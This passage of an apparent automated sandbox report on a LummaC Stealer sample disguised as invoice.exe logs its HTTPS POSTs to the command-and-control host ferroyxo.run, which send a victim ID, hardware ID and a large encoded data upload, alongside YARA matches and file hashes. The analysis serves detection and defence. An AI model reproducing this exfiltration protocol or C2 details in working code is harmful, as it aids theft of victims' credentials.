                                                                        2025-04-02 09:42:51 UTC2404OUTData Raw: 2d 2d 30 34 43 70 53 59 38 51 39 78 68 64 57 45 55 49 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 30 34 43 70 53 59 38 51 39 78 68 64 57 45 55 49 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 34 43 70 53 59 38 51 39 78 68 64 57 45 55 49 34 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
                                                                        Data Ascii: --04CpSY8Q9xhdWEUI49dContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--04CpSY8Q9xhdWEUI49dContent-Disposition: form-data; name="pid"1--04CpSY8Q9xhdWEUI49dContent-Disposition: form-data; name="hwid"
                                                                        2025-04-02 09:42:51 UTC264INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:51 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Vary: Accept-Encoding
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60ea7c4a437e-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-04-02 09:42:51 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                        Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                        2025-04-02 09:42:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.749686172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:52 UTC276OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: multipart/form-data; boundary=fbxl3f5CQUpt
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 568670
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 2d 2d 66 62 78 6c 33 66 35 43 51 55 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 0d 0a 2d 2d 66 62 78 6c 33 66 35 43 51 55 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 66 62 78 6c 33 66 35 43 51 55 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 46 43 32 30 34 44 46 30 44 39 32 36 38 44 46 33 45 39 36
                                                                        Data Ascii: --fbxl3f5CQUptContent-Disposition: form-data; name="uid"e91dba334d13b3862d5fcf1c07f54f82f2e4b89799--fbxl3f5CQUptContent-Disposition: form-data; name="pid"1--fbxl3f5CQUptContent-Disposition: form-data; name="hwid"4DFC204DF0D9268DF3E96
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 22 f9 12 5e d4 b0 45 b6 ea 1c 38 14 8a 7a e2 ad c0 d5 29 2e 17 37 f9 13 7c c9 d2 2b 57 82 bc 0b c5 40 37 ba f4 1d 0a 73 64 15 07 c0 dd c0 8b b8 40 88 ab 0b e3 87 f6 67 68 1a c1 77 75 fa 29 aa 67 55 81 f4 8e 25 c0 48 94 dd c2 8a e6 16 f9 a9 a4 ce 11 f4 75 de 18 0c a3 03 a8 b4 eb a6 15 5c 07 b6 b4 95 4c c5 0b ba 4b 7d d7 46 7d 7c 86 7f d0 8c f9 90 53 9d be f0 d1 b9 50 32 b8 70 34 1a d0 c3 3b 6e 13 ac b2 6d c8 17 c6 97 fd 6e 88 e9 d4 74 3d 38 9a a7 b9 58 cb 40 7a 1d 20 9a bd b1 d2 d2 99 60 c9 d2 38 37 bd 87 fd 24 8c 07 46 06 46 a8 ff 2c 7c ed 20 e5 50 dd d7 37 64 6d ad 55 21 d2 21 6c 65 78 f0 62 2a 93 5d 4d b0 1e fb 66 54 dc 3b ad ba fd 3e f8 8d 7d 91 bd bc 6b c6 0e 5b be d9 f6 2e 5c 6f de 44 90 47 6c 98 50 2e 14 eb 8f 90 69 c4 0d c9 78 6e 80 9c d2 ee 00 5a
                                                                        Data Ascii: "^E8z).7|+W@7sd@ghwu)gU%Hu\LK}F}|SP2p4;nmnt=8X@z `87$FF,| P7dmU!!lexb*]MfT;>}k[.\oDGlP.ixnZ
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: fb 88 41 9b f9 1e 98 ef c6 ca c9 f3 0c 14 2c f7 45 52 bf 51 a3 7e 96 10 3f 0a 21 1f a3 79 2d ff 6c 45 e3 f0 f0 2f b7 6d 7c bc 69 2c c5 85 c3 1c fa fa 37 d2 ff b2 a5 59 e7 5d df cd 88 ec 6f 07 c1 d4 1b da 3f 85 ba 83 9e cf 19 84 92 e2 67 d8 07 34 14 ea da 41 b6 e2 38 d6 ac 80 33 97 6d be b2 a6 0f 54 97 4a 8e 25 ce 2b ab fa e8 ce e8 02 d0 4c 2e 8d b8 57 4d 60 cf c0 ec 0a 8d fe 41 4e f4 d4 93 89 9a 7f 05 71 50 d3 b8 0e c2 e8 16 0d 83 fe fe c5 02 fb 68 b4 d3 72 8b 77 e8 86 f2 25 2b c3 55 37 9e 8f 5f f3 c8 af 59 a8 4a 83 0a 05 96 05 03 0e 9e ed 8e 41 db 94 02 2c b4 96 45 15 d1 9d 4a 18 fb ac 40 3f 04 77 f5 fe 20 62 e0 e6 d6 06 84 bd 67 a0 4c b9 0a fb 3a 0c 93 ee e5 b1 db 12 67 cc b6 3d f0 fe 42 36 6f 86 69 1e f6 a6 d7 6f 18 fb b6 e8 8a 39 9c a1 75 76 60 5a 45
                                                                        Data Ascii: A,ERQ~?!y-lE/m|i,7Y]o?g4A83mTJ%+L.WM`ANqPhrw%+U7_YJA,EJ@?w bgL:g=B6oio9uv`ZE
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: ad e7 a4 bd db 30 e2 d4 62 7e 43 00 fa 69 26 98 38 89 a8 6b 5b 49 97 3a 2f d1 fe 36 83 58 23 cd 93 44 7d 59 c1 7f 05 b6 eb cc 95 b9 b1 1a 1d 9f ac 79 33 71 1c 00 c1 05 b4 0a 1c 5a c8 e2 aa d7 44 f7 35 82 f1 4f e7 4c 45 59 44 46 51 28 fb 2d 45 ff 86 dd 53 08 3a e5 37 2f 56 6a f6 a5 a4 02 66 64 f1 99 58 db b2 b3 5d 05 fb f9 85 74 0c b1 e7 b5 4d c9 0a 7c c9 61 83 3c 4f cc 2d e7 9a 22 92 d3 f3 8d 5d 1b 2d bb 40 1a 1c b9 f6 87 45 92 45 85 b3 e4 0e 6e 12 35 56 e5 30 86 d4 56 c5 f7 88 e9 39 95 1d f3 c9 ab 7c 26 fc 38 9a 23 92 dd 88 66 16 fe b6 36 25 ae 3a 2e c9 a2 da 56 18 c4 58 8f bf 3f 29 4f a1 e6 96 74 e8 8e 16 26 15 ba 11 7c 92 a5 ac ee b1 8a 6d b8 9a ad 2b de 9b f6 b1 49 bb bb 4e c9 25 8a 55 27 d8 ea 27 e0 8f a4 11 8d 30 45 19 37 ad 74 77 62 ea 06 e5 ee 1b
                                                                        Data Ascii: 0b~Ci&8k[I:/6X#D}Yy3qZD5OLEYDFQ(-ES:7/VjfdX]tM|a<O-"]-@EEn5V0V9|&8#f6%:.VX?)Ot&|m+IN%U''0E7twb
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: c6 76 56 08 ea 1c d0 44 50 2b 91 c0 48 7b 0f 64 d3 c6 1c a0 8c e7 90 ac 7f 0f 3a be 59 45 b7 71 5c 39 68 b8 22 c5 d8 22 b1 d2 0c 9c eb 2c d7 6a 58 38 82 72 42 cc 34 d4 81 8b 38 41 45 95 21 6d fe 9c e2 08 b8 4d f0 67 c7 e3 0d 67 c7 e9 17 45 1b c8 9c ac d4 52 66 40 32 40 ee 0e 75 fc 50 01 a6 f1 37 d2 db 50 16 17 15 fe c2 51 46 9f b5 95 ad 8b 61 dd 73 de ea de 7b ff 94 48 35 da aa d1 8e ef 12 a9 7b fa be 8d bd fc 63 37 0a fc f0 8e ce 46 d4 c1 78 4a 9a fa b9 54 ae ab ca 6c 05 c9 20 71 cc 29 2a 0d 6f 9b d4 ec 0b 8d 52 b5 6d 07 31 87 16 94 cc 38 33 37 b1 f1 4c 7a ef c7 67 69 44 3c e3 d0 30 63 60 0a d2 00 fe cc 4c d2 c3 0a 60 49 b8 bb 0b 1c ff f1 86 8e 30 8c d0 13 93 cb 9d 9e da ec 85 52 2f f7 d0 cb ab d7 8e e2 10 1f d2 c8 32 e6 56 54 a9 17 d3 d4 4f 04 0b 1a 05
                                                                        Data Ascii: vVDP+H{d:YEq\9h"",jX8rB48AE!mMggERf@2@uP7PQFas{H5{c7FxJTl q)*oRm1837LzgiD<0c`L`I0R/2VTO
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: de 8c 32 7f 60 c1 68 30 12 e7 4d d0 29 9f 3d aa 71 44 03 d9 5b bd 6d de 6c 51 01 f5 95 04 e6 df 93 21 32 fd f7 67 fe 55 84 7b 2d 19 fe 08 b4 c0 d6 34 b2 2f 48 f2 c9 7c bd 0a 05 da 35 77 f0 68 ed a0 e6 17 ce 61 8a 74 17 a7 90 49 93 30 1a 32 ff c3 93 b1 cd a0 68 a5 f8 89 d7 67 1d b1 8d 15 3e 27 4e 68 8a 1f 2f bc 9c 39 5b ac d8 d5 32 7a de 6f 71 99 4f 90 d0 fe a6 9a fc f7 5d af 76 1b a8 3a dd d1 be eb 7f 2f 12 a7 23 96 56 dc ee fd 52 2d f5 8e 2d fd 63 55 aa e6 14 7d af 73 e1 78 b1 0c 5d d2 b0 6f b7 2b 51 c6 ec e8 b7 cb a1 1e b1 12 30 69 12 60 b3 13 89 9d 7a 70 0c e5 25 5b ec f9 cc 73 44 ec 31 8f 0f 1d f7 96 b5 e5 43 9b 49 9a 36 ec 89 45 38 a4 f7 60 a4 90 46 50 42 a0 64 35 3b a5 04 77 7c d8 9a ea 1d 6d e5 2b 8d 9d 51 bf d9 f8 e2 64 b8 9e 6f 8a a6 98 47 8f 2f
                                                                        Data Ascii: 2`h0M)=qD[mlQ!2gU{-4/H|5whatI02hg>'Nh/9[2zoqO]v:/#VR--cU}sx]o+Q0i`zp%[sD1CI6E8`FPBd5;w|m+QdoG/
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 9f c8 97 a1 91 38 ad 7c 65 20 77 be 9e 6e d6 f1 e4 2f 77 dc 25 3c 93 a4 5e a0 da 8c cb 9f 97 d8 fe 9f 95 5f ef c0 5f 00 27 7e fd e7 ac d8 37 26 89 e8 f6 59 ef c0 09 15 8b d5 a5 8a 1d 3c 37 f7 e0 b9 d6 d4 24 e5 ba f9 9d 07 5c 35 c9 92 3f 04 83 e6 e8 48 b6 9d 39 cd c4 35 a9 c2 61 43 f4 37 4c 9c c8 0b 5a 12 aa be 6b 6d 82 8a 31 72 b9 dd 26 52 36 a3 f3 a0 3a e8 a4 e7 b7 53 d5 ee 60 b6 75 2c 93 97 a4 8e d0 50 f3 6c 8b 16 f4 41 a2 1c 8f 93 99 7f 63 a3 9f a9 a9 53 3e c4 28 f5 6e 14 10 46 0d 69 68 e0 14 5b d0 ac 8c 11 b4 46 74 f6 83 0c 96 de 95 a7 e3 11 55 e9 09 d9 87 a5 0c e3 bb 1f 1d fc 43 c6 2c 2f 41 69 e0 fe e9 ca 6f af d2 14 50 c6 56 87 4d 98 92 dd 20 8b b5 4e 8a b6 11 49 0d 69 db f0 64 91 de f7 1b a6 91 77 69 c1 4d e5 93 ea 6a b4 33 ae a5 e5 0c 5a d5 51 fa
                                                                        Data Ascii: 8|e wn/w%<^__'~7&Y<7$\5?H95aC7LZkm1r&R6:S`u,PlAcS>(nFih[FtUC,/AioPVM NIidwiMj3ZQ
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 66 ad 97 5c a1 60 42 3d 21 ab dc c1 7f 14 55 30 b2 2c 2c 5f 1e 09 2e b0 78 2b 5c e6 d3 50 8d 84 88 9f e8 1b 8c 2f a6 d6 19 fb 08 29 8f e2 e5 39 89 da 29 8a 38 1b f6 77 e4 89 1c 0d 1e 2b f6 7a 01 88 38 1c 35 14 9e c5 db a5 57 6c e6 75 4e 81 64 06 20 70 69 e3 97 a2 98 77 9e 71 ed 8d af 0f 85 0e 5f ae 61 ba 01 55 d2 4a 42 8c 49 ac c4 8e 1d 40 36 d9 ea b3 9c d4 bd 6c 01 a0 3e 89 b2 c3 74 8b 2b 3b 52 1e a0 a0 e3 b2 04 52 c7 e8 1f 92 1e b4 d6 35 9c d5 86 01 40 6d 63 ea b3 a5 c0 8d 40 a0 7d 43 52 5d 4a 1e e9 74 cd 3f 4a aa c7 9b df 6e 5d c0 64 83 1c 5f f6 d6 a7 e8 08 a7 00 37 83 69 66 b0 53 40 61 e6 7a 99 6c 50 42 ba d7 33 dd 88 6e 9e 06 52 e7 18 6c 32 bf 52 93 39 28 f5 6a c9 52 74 0b aa 2a 44 44 0f c0 2a aa 84 f4 bc 08 64 1d b8 0e 1e 37 76 02 29 8a 77 ca 69 12
                                                                        Data Ascii: f\`B=!U0,,_.x+\P/)9)8w+z85WluNd piwq_aUJBI@6l>t+;RR5@mc@}CR]Jt?Jn]d_7ifS@azlPB3nRl2R9(jRt*DD*d7v)wi
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: 22 12 5c 38 2e 9a 92 05 7b d6 04 c1 25 68 3f 6f 92 89 ff d3 64 ad b7 8f 5a 66 bd 6c 2c 1a 1e 00 a6 27 5c 0b bc 23 41 01 19 1b df b1 ad 79 07 27 c4 d6 2a c8 5b 5b 52 0a 4a c0 4b 6a de 7b 24 15 14 da cd 2d 3d 2c 41 83 0c c4 ad ec b1 6b b6 4b 91 71 a2 3f a3 83 3d a4 e4 44 b4 37 39 8b d8 e3 a9 97 86 b3 20 95 50 f5 78 4e d7 a1 90 8a 02 90 2f db 0e e8 41 38 3a ce 5b 43 f5 e1 32 c9 25 7a fb de b5 ff 64 4d cb 2d 9b 39 d3 2d 0f dd da 98 9b 4e d3 ab 65 a4 6f 30 3d 3b 21 db e1 86 fb 25 1e 40 a9 33 d2 e1 cd 56 ea 9a 6e 60 39 1e 5c 97 b8 e5 05 b6 96 c7 70 b2 55 91 7c 0b 14 d9 a4 31 12 e2 3b 5d a6 aa d2 81 0c 5d d6 57 24 b9 e5 72 48 bb a4 c4 f5 7e ba f4 a2 c2 04 1a bb 6c 66 45 05 4e e3 8a 50 67 31 79 89 2e b0 d0 ba 37 4d d7 b1 fa b2 6c 90 24 2b 68 80 6f ca a1 f4 dc 95
                                                                        Data Ascii: "\8.{%h?odZfl,'\#Ay'*[[RJKj{$-=,AkKq?=D79 PxN/A8:[C2%zdM-9-Neo0=;!%@3Vn`9\pU|1;]]W$rH~lfENPg1y.7Ml$+ho
                                                                        2025-04-02 09:42:52 UTC15331OUTData Raw: bc d5 01 d6 96 56 74 77 22 74 b1 bf d7 6d b5 47 a1 0e 10 0e bb 9e 9e 38 9e 67 cc ee ce 94 ac 14 32 44 e9 a3 f0 79 77 38 b7 47 4d dd 33 40 0f 07 f2 a2 35 dd b9 7c af 64 34 7f ad 06 cd 79 fd 4e 3a 19 ea e6 c2 49 1e 98 f6 0f af 22 69 62 80 55 f0 73 aa 5a f8 94 68 a7 fe 78 d5 3e c3 70 b8 0b 4d 67 64 72 77 7c e5 8d 1e 84 79 28 5b b4 65 13 90 57 62 7e 08 94 b1 1d f7 0e 9e 75 4d e6 20 38 f3 df 32 b1 f2 56 96 da f7 a4 3b e5 b8 ff 7a b8 f1 2e 36 c1 29 68 a0 fc 15 cc 23 e8 a5 e5 5f 36 8c 7e 79 ed 93 63 df 53 ad 02 07 b1 a8 6b 84 ca 94 f3 08 62 8d 1f 91 de 5b 18 3c 4c 53 11 b1 92 4a 5e 85 ab 10 72 4d 32 e4 6c b5 da f0 a4 70 e7 05 92 0d 56 87 3d ff 27 54 e3 7a 12 3c 7b 83 a6 ed 7b 91 8f 6d 67 c5 a0 9b d1 0e bc fe c5 2d 80 a1 57 39 48 ff 75 b4 75 c5 87 37 58 df 8a cf
                                                                        Data Ascii: Vtw"tmG8g2Dyw8GM3@5|d4yN:I"ibUsZhx>pMgdrw|y([eWb~uM 82V;z.6)h#_6~ycSkb[<LSJ^rM2lpV='Tz<{{mg-W9Huu7X
                                                                        2025-04-02 09:42:53 UTC264INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:53 GMT
                                                                        Content-Type: application/json
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Vary: Accept-Encoding
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60f20f9d20f8-EWR
                                                                        alt-svc: h3=":443"; ma=86400


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.749687172.67.131.1704436892C:\Users\user\Desktop\invoice.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-04-02 09:42:54 UTC263OUTPOST /quiwdz HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                        Content-Length: 89
                                                                        Host: ferroyxo.run
                                                                        2025-04-02 09:42:54 UTC89OUTData Raw: 75 69 64 3d 65 39 31 64 62 61 33 33 34 64 31 33 62 33 38 36 32 64 35 66 63 66 31 63 30 37 66 35 34 66 38 32 66 32 65 34 62 38 39 37 39 39 26 63 69 64 3d 26 68 77 69 64 3d 34 44 46 43 32 30 34 44 46 30 44 39 32 36 38 44 46 33 45 39 36 42 31 41 32 43 32 42 39 33 46 37
                                                                        Data Ascii: uid=e91dba334d13b3862d5fcf1c07f54f82f2e4b89799&cid=&hwid=4DFC204DF0D9268DF3E96B1A2C2B93F7
                                                                        2025-04-02 09:42:54 UTC241INHTTP/1.1 200 OK
                                                                        Date: Wed, 02 Apr 2025 09:42:54 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 43
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        Cf-Cache-Status: DYNAMIC
                                                                        CF-RAY: 929f60fdba951839-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-04-02 09:42:54 UTC43INData Raw: 62 ff 6f f2 84 14 98 9d 61 cd 66 3a 31 10 76 93 be d3 00 65 dc 40 f1 da 7a 72 37 59 7e ff 6c 52 69 e8 8e 16 24 d1 53 20 9e a9 05
                                                                        Data Ascii: boaf:1ve@zr7Y~lRi$S


                                                                        051015s020406080100

                                                                        Click to jump to process

                                                                        051015s0.0051015MB

                                                                        Click to jump to process

                                                                        • File
                                                                        • Registry

                                                                        Click to dive into process behavior distribution

                                                                        Target ID:0
                                                                        Start time:05:42:41
                                                                        Start date:02/04/2025
                                                                        Path:C:\Users\user\Desktop\invoice.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\invoice.exe"
                                                                        Imagebase:0x300000
                                                                        File size:845'824 bytes
                                                                        MD5 hash:57BCB61167ABD03D9D98705AB39E79AB
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1003304693.0000000002760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1003392008.000000000280F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true
                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                        Non-executed Functions

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.973091706.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Offset: 00842000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_842000_invoice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .COM$C:\U
                                                                        • API String ID: 0-2478718401
                                                                        • Opcode ID: f9526cffd469c7da0b387d1e40664bbd004d271562f574e3d0529928e5da0a84
                                                                        • Instruction ID: e1402fdccab04c350a9d5da76ee4b3206753b5fcf4d9cfd10928e097d5b11f90
                                                                        • Opcode Fuzzy Hash: f9526cffd469c7da0b387d1e40664bbd004d271562f574e3d0529928e5da0a84
                                                                        • Instruction Fuzzy Hash: D1B10C6284E3C54FE717877448796A5BFB0AE2721871E86EFC0C1CF4A3E649484AD763
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.965445711.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, Offset: 007DC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_7dc000_invoice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e2b4c9d924f7ba0567a2e5b83c09d9e8ec1c061f0fee0df46bce4283bb41a3b
                                                                        • Instruction ID: 2b2186dc6d314be66b2bd330e501ede591a9d3e95a6257d21ca030b3b3e23e53
                                                                        • Opcode Fuzzy Hash: 7e2b4c9d924f7ba0567a2e5b83c09d9e8ec1c061f0fee0df46bce4283bb41a3b
                                                                        • Instruction Fuzzy Hash: 2642316280FBC94FDB1787724C69591BF706E2B21975E86DFC4C18F0A3E24D884AC766
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000003.965445711.00000000007DC000.00000004.00000020.00020000.00000000.sdmp, Offset: 007DC000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_3_7dc000_invoice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af409577ee6589cb822822d629760c3d3a087d8672c28244692cb46bbb1b6d4e
                                                                        • Instruction ID: 4bbe302d5089a8ec1b5e65de691188a48a57c7e7389ba80a6bbbbb2d8697e989
                                                                        • Opcode Fuzzy Hash: af409577ee6589cb822822d629760c3d3a087d8672c28244692cb46bbb1b6d4e
                                                                        • Instruction Fuzzy Hash: 97A1865684E3C14FDB1B8B714DB9691BF70AE2720471E8ACBC8C5CE4A7E24D580AD323